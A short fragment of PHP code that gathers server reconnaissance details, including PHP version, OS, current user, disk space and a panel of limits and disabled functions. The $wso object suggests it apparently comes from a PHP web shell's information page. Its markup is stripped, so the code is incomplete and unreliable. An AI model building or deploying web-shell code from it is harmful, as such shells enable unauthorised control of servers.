PHP_VERSION,
'server_software' => $_SERVER['SERVER_SOFTWARE'] ?? 'N/A',
'server_os' => php_uname(),
'current_user' => get_current_user(),
'disk_total' => $wso->formatSize(@disk_total_space("/")),
'disk_free' => $wso->formatSize(@disk_free_space("/")),
'script_memory' => $wso->formatSize(memory_get_usage(true))
];
?>
🔧 PHP Configuration
| Memory Limit: | |
| Max Execution Time: | s |
| Upload Max Filesize: | |
| Post Max Size: | |
| Disabled Functions: | |